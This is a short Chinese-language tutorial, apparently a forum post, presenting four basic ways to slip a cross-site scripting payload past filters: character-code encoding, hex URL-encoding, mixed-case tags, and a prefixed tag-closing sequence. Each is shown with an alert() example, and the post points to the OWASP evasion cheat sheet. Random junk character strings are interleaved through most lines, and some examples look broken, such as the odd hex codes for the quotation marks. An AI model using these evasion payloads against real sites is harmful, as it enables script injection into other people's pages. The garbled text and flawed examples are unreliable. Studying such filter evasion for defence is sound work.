四种超级基础的绕过方法。
% `' |4 Q* G: j$ C; t1.转换为ASCII码3 x. q8 {; n7 f# B8 U: r
例子:原脚本为<script>alert(‘I love F4ck’)</script >' d4 i( R; d% r' H1 Q0 I4 j: r; T( j1 f
通过转换,变成:8 D6 W( s7 k4 b( u; K' \/ u1 B) Y1 r4 \
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>/ V( x. W4 \! A5 R J# m
# B- u1 K' y& s6 U' s I
2.转换为HEX(十六进制)
' y3 n h) I" F1 ~" ]7 g例子:原脚本为<script>alert(‘I love F4ck’)</script>; U4 E% G8 b0 @, h
通过转换,变成:
$ I1 L; p+ ~# s9 a9 T; [4 p%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e2 z+ H& g' H/ [3 U& g' d
) h' Q$ n5 ^( d! f" W5 ^) u" L
3.转换脚本的大小写( K9 \; Y" b, P8 j) h0 E" D
例子:原脚本为<script>alert(‘I love F4ck’)</script>( W: Y: S/ C5 ~
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>: k( P! G6 F: X5 \; F" ]
/ u) ]1 t2 a; D; y4 E4 U$ V
4.增加闭合标记”>( t/ i" X; t+ u! U
例子:原脚本为<script>alert(‘I love F4ck’)</script>3 }" `) L8 n& ?7 e
转换为:”><script>alert(‘I love F4ck’)</script>1 {% ]: P# M& W0 n- x; g
更详细绕过技术请参考此网页
T L: }5 b9 I5 J% @7 f* \https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet9 u/ t4 _! y5 J
T3 f. A% |+ v! u3 a
转换工具使用的是火狐的 hackbar mozilla addon. |